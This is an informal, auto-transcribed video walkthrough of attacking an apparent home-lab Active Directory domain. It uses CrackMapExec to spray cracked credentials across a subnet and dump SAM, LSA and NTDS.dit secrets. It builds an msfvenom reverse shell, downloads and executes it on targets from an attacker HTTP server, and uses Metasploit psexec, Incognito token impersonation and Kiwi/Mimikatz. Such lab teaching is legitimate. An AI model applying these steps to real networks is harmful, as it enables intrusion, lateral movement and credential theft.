So welcome back. A little bit of a late start today, but we're doing some stuff. So today we're going to be looking at Crackmapexec, and then maybe a couple other things we'll see. So Crackmapexec, right? Very first thing, if you type in Crackmap, actually we'll do it down here, so I don't lose my notes from up there. Crackmapexec, right? We do a tac help. It's helpful, but it doesn't nearly give what this thing can possibly do. Alright, this thing is pretty amazing, Crackmapexec. Okay? We got SSH, we have SMB, but what we're going to look at today is SMB, right, with a username, but we're going to look at an entire network, right? We're not just going to look at just one person. We're not just going to try to just crack into one person. So if we go over to my Windows machine over here, as we can see, I already got this Crackmapexec pull up, and this is p-test method. I just typed in Crackmapexec, little documents or whatever. This guy pulled up. Alright, and actually this old help, like right here, so we have, okay, Crackmapexec SMB help. So we can do that. Let's try like that, because I never knew we could do that. So let's try that Crackmapexec, something SMB, tac help. Could we do it like this? We can. Okay, cool. So I did not know that we could actually do it like this. So this is like where our help's at, as you can see. So we can dump SAMs, we can dump LSA. There's a lot of stuff we can do here. But one of the things that we can do is we can look at an entire network. Okay. So if we look at this guy, right, our target machines can actually be a whole like /24 if we want to. So we can actually hit up a whole domain with credentials that we found, which we already have credentials. We found those in the last couple of videos, right? So credentials that we found, we can hit up a whole domain and see, hey, where else can we log in with this guy? Can we log into the domain controller? Can we log into other computers? Can we, start to move around this network? So let's go ahead and do a Crackmapexec. We're going to do SMB, right? We're going to look at that, because that's what we found, right? We did our NTLM and everything like that. We found our SMB stuff. We already did it with psexec.py and everything like that. We did pass the hash with everything. So with SMB, 10.0.0/24. Now how do I know it's a /24? If I do an ifconfig, right? I'm on 255.255.255.0. Now, if you still don't understand how that's /24, go ahead and leave comments or whatever, and I will make a video on subnetting. Or if you guys want to watch a video on subnetting, go ahead and let me know. Our username, right? TACU, username. We found that. Our password, we cracked a password, I think in the first video, I believe we did. First or second video, we cracked the password utilizing a hashcat. Our domain is ogc.local. Right, and then we'll go ahead and get rid of that for now. Okay, we won't do the SAM yet. So this is going to spit header.wonderland with this password across this domain on this subnet. Go ahead and enter, and as you can see, we start getting this pond. Right, so that means that this machine we can get into, this machine, and this machine. So that means all three of these machines we should be able to get into. Now this guy can get into domain controller. He's able to, right? That doesn't mean that, depending on how you set yours up, you may not be able to, whatever else. Okay? But you may have to find more credentials, things like that. But he's able to get into domain controller. As we see, it's called domain controller. So if we do a psexec, or Python, actually, I think we just type in psexec now. exec.py. Can I just type it like that? Nope. Okay, so Python 3 psexec. Let's go ahead and locate psexec.py. So we'll do Python. I think it's Python. Home, Cali, and packet build scripts. Psexec, right? .py. Our domain. Okay. / our user, the password, and then where we headed to, right? So we're gonna try 10.0.0.0.16. Let's see if we can get in there. Okay, if not, that's okay, because we got other places to try, right? So let's go ahead and try Python, psexec. Let's try it on 19. Sure, why not? Okay, we do get into 19. Cool. So let's go ahead and cd into that. Let's also do a who am I like real quick. And we're NT system authority. Okay, awesome. Let's go ahead and exit out of here. So he's saying that he can log in at 10.0.0.16. He's pawn. We're coming over here. It could be something like a firewall. Some of that could be stopping us. There's quite a few things that could be stopping us from doing this. So we may not be able to just log straight into the domain controller. So let's go ahead and try it on 20 now. Try the same command right on 20. And sure enough, we are logged in. Who am I? And we are NT Authority System. Alright, so now let's go ahead and start to look at what else can we do with this guy, right? Because we did a SMB TAC help, and we saw we could do a lot more things with him. Okay. Use Kerberos authentication. I know we could do that. It's pretty cool. There's a bunch of stuff that we could do in here. Domain, local authentication, authenticate locally to each target. The port, we can specify what port it's on. So default's 445. The SMB share if we want to. Let's go ahead and try to dump the SAM database. Do TAC-SAM. Alright. And right now we're trying to dump it on 10.0.0/24. We could have just did it by an IP or by a network, right? So we're getting the SAM database now for this network, right? So their user, there's admin, Ryan, Hatter, okay? Admin on vol 110, so we could try to crack this. We could try to crack Hatter again if we really want to, even though we already know his password. All right, awesome. Let's try to dump LSA. See what we get here. Dumping LSA secrets. Yep, sure enough, we get the LSA secrets. So we are getting some good stuff in here, huh? And this is all without, remember, Meterpreter. Because this is usually the kind of things that we do with Meterpreter, right? This is all without that. So we're getting some great stuff in here without Meterpreter, without Metasploit being up and running. So that's awesome, like right there. And that is really, I mean, that's Crackmapexec, like right there. I'm trying to see what else we can do with this guy. gfail, limit, ufail, module, list modules, server, no brute force, domain, local authentication, continue on success, dump the ntds.dit, we can try that. And we do get that. Okay, so we're just pulling out all our secrets and everything, alright? And then we can obviously, oh, here's a Kerberos ticket ticket actually. There we go. Okay, that's something that we could use like right there, huh? That is definitely something we could try to use. Especially if we find like a service account, which I don't have one set up yet here, which I'm probably going to set up here in a couple minutes. We'll most likely set up one of those accounts, a service account, and then maybe try to do some things with that. But there we go. Okay, so that's NTDS. Okay. If we wanted to try to do different shares, enumerate active sessions, disk logged on users, enumerate domain users if a user specified that only its information is queried, local groups. So there's a, wow, I did not realize how many things we could actually do with this. We could put a file. Now some of the things I was actually seeing over here, execute the specified command. I wonder if we could do something like TACX command.exe. Or do something like that. And get like a command window. Or what if we would have to do, if this would have to be loaded on like the machine itself, huh? So I wonder if we could do something where we actually like download something like maybe a PowerShell command. Maybe something like that. Let's try that. Crackmapexec, okay, TACX, capital X, then the PowerShell command. Let's try wget. Let's go ahead and do an ls-tech-oa here, see if I have anything. Loot sharp-hound.exe. Let me go ahead and make a reverse shell in here, I guess. We'll do something like that. So let's do, let's make a reverse shell. We'll make that up here so you guys can see it better. MSF Venom. TAC Windows. Alright. Windows shell reverse TCP. Yep. TAC actual. Yep. Okay, that's all good. Let's go ahead and check out my IP address real quick. I have config. We have 10.0.0.13. It's going to be an executable. We'll name it shell.exe. Okay, yeah, we can do Windows shell reverse TCP on port 99999. Sure. From here, we can use exploit multi-handler. Works the same, just like I've always said, as netcat, right? Let's go ahead and do use exploit, or excuse me, MSF console, TAC Q. That's just quiet, just so the banner doesn't show up, even though that's the most important command is banner. So let's do a use exploit multi-handler. Set payload to Windows shell reverse TCP. Can I do that? Set payload. Probably because it's Windows. Jesus, set payload. There we go. To Windows not window. Windows shell. I am messing this up on set payload. Windows shell reverse TCP. There we go. Set our port to 9999, right? Set L port to 9999. Set L host to 10.00.13. We'll go ahead and run that in the background. Here, run tag J. We'll come over here. Let's try this. So we want to do a wget. Let's try TechX. We'll do wget HTTP 10.00.13. And let's go ahead and start up a Python shell. So Python 3 tech-m simple server on port 80 /shell.exe. Right, this is an 80 home lab, right? And I put this file in 80 home lab, and we are listening on port 9999, and I have the proper L host. We're going to try to grab that. Tech out file is going to be shell.exe. Let's try that. Oh, end quote. Yep, answer. Can we do this? It's getting it. Ooh, hoo, hoo. Okay, so vol DC cannot get him. The other two did. So obtain malicious content. So vol DC was like, hey, I can't take this. So if we obfuscate him, we could definitely get that then, huh? So they got him. So now all we got to do is run a command. So let's try tag regular X. And let's try it on one at a time now. Let's not try it on both of them because then we're really going to start messing stuff up. So let's go ahead and .19. Now, I've not done this yet. I've never done this like right here, so this is kind of something new for me. We're going to say run a command shell.exe. Let's do that. Is that like a thing? I feel like I have to open up shell.exe though. You know what I'm saying? I feel like I have to. I wonder where the actual drop that to. SMB client. Let's try that. And that was on .19, right? I don't think it's called SMB though, is it? Is it called SMB? I don't know what it's called. Yeah, okay, I think it's called share. I think I named it share. Nope, I don't remember what the share is named. SMB client. Can I do? I've never done this one like this before. Like a. Can I do that? Still saying work group. Maybe that's what the problem is. I might have to do like /OGC or some of that. We'll try. Okay. So I'm not seeing actually anything in 19. Let's try 20. But actually, it's probably going to be at 16, huh? SMB. Okay, so it is named SMB. Okay. So how the heck do I get into there then? Because it just dropped that file into there, right? Let's go ahead and actually look at the machine itself to see like where did it actually put that file, I wonder. So I don't know which one is 20. Did I drop it into 20 or 19? I dropped it in 19. I don't know which one is 19, but let's actually go in here. Just so we can try to figure out how to actually do this like right here, right? So we want to look for shell.exe. I don't know where it put it. Maybe in downloads, documents, this PC, C drive, shell. Okay, so put it in the C drive. There it is. There's shell.exe like right there. So put it into the C drive. So can I do like a command? Now I'm wondering with this command, I wonder if it's actually opened up command prompt and doing it. So can I do like a? Can I do something like that? Oh, there we go. All right, let's go. That is something new for me. Let me go ahead and throw this all into my notes like real quick. I'm doing some crazy stuff now. I have never done that one before. That is pretty cool. Let me go ahead and actually, I'm going to throw this in my notes. I'm going to get this as nice looking as possible. Okay. Let's go. That was a nice one like right there. Go ahead and grab the SAM one. Okay, go ahead and grab this, the same one like right here. That was pretty cool though. Now we know that it drops into the C drive also. We can do a lot of stuff now. Now we can really nefarious with this, huh? With this Crackmapexec. I like that. I like that a lot. Okay. And then we also, okay, so we made a file, so we're going to use Crackmapexec to upload the file. Use it again to run the file. There we go. Boom, and that put it on both machines too. That's what I really like. That file is now on both machines. Okay, and then we use it again, right down here, to run that file. Bam. Now, if we were to run the whole network, it probably would have only got one, and then the other one would have said that it was busy or something like that. So we should now be able to do a sessions 1, and who am I? And there we are. Okay, let's go. That's what I'm talking about, like right there. That was pretty cool. All right, awesome. I mean, I'm super stoked to see that. That was pretty awesome. Let's go ahead and move on to our next topic then. What we can do next is we can do maybe Incognito. Something like that. Let's go ahead and exit out of here. I'm going to clear this out. And so we're back to, we did our NTLM and everything. We did our proper recon. We already gathered some hashes. We already cracked them right. So we're back to that again. And we are wanting to actually get into a system, and we're going to use psexec.py. And we're going to load what's called Incognito. So let's go ahead and search for psexec. We're going to use 10, exploit Windows SMB psexec. Alright, so there we go. Psexec. Okay. We can keep it as this. That's a fine payload. Show options. We can go ahead and set lhost is good, lport is fine. So let's set our SMB user to header.wonderland. Let's set the SMB domain to ogc.local. Set the SMB password to header.wonderland password. So my password 1, and set the rhost to 10.00.19. Sure, okay, whatever we want. Go ahead and run that, and it gets through. And we do a get UID, and I am NT authority system, right? Now, what if we want to use Incognito and try to take a token and switch our user? Okay, so let's say we're not NT authority system. Let's say we're an admin, or let's say we're somebody else, or maybe you want to actually focus on one person or something like that, or maybe we see something in another system that we want to use, or I did that. So let's go ahead and load Incognito. Okay, and we can press question mark now. When we load Incognito, we now get these Incognito commands, right? So once we get these Incognito commands, we can now impersonate a token. First, we have the list of tokens, then we can try to impersonate it. So we can start to laterally move like this, right? Let's say we were Alice.Wonderland, and we then became Hatter.Wonderland, but he still was an admin. Then we became Twiddly D and Twiddly Dum.Wonderland. Just kept going, and just trying to see what the different privileges that each user had was. We could do this with impersonate tokens. Let's go ahead and do a list tokens, tech U, right? And we can see that we have all this, right? So let's say we were window manager DWM1. We want to become Hatter, right? We'll go ahead and copy him, and then we're going to do an impersonate token, and we're going to throw him in there. It's not going to work. Why? Because we are using interpreter, and this is an escape character. Look. Okay, that's obviously not like where we're going, so we have to do double backslashes, right? Enter. and we have now impersonated him. So we are now him. So if I do a shell, and I do who am I am now header.wonderland. If we exit out of here, we do a rev to self, and I do a shell, and I do a who am I'm now entity authority system. Okay, that's because rev to self is revert back to what we just were, what we just had. That's what that does. So that is utilizing incognito with impersonating tokens. All right. Something else we can do inside of here is we can go ahead and we can load Kiwi. Right. There's a bunch of stuff that we can load in here. Kiwi is the new Mimikatz guy. So if I press question mark, we now have a whole bunch of Mimikatz stuff we can do in here. Right. Like LSA dump Sam, which we literally just did with incognito or with what was it, Crackmapexec, right? So there we go. Okay. So there's our SAM database, right? And there's a bunch of stuff we can now do inside of here. What we're going to do next time is I'm going to go ahead and we're going to make a service account, which, what time is it? 9:28. Let's see here. We could probably do it like real quick. I actually have my notes on it, or I have my. I want to do is it's Kerberoasty. What we're going to do. We'll wait till next time. We'll do Kerberoasty next time. Even though we just did incognito this time, we'll do Kerberoasty next time, and maybe like GPP or whatever's next on the list to do. Yeah, we'll wait till next time, and I'll go ahead and show you how to make a service account next time on Windows. And we'll do that one tomorrow or next day, whenever we're able to. All right, so glad you guys stuck around today, and I will see everyone later, maybe tomorrow or whatever. Have a good one. Have fun. I'll talk to y'all later. Goodbye.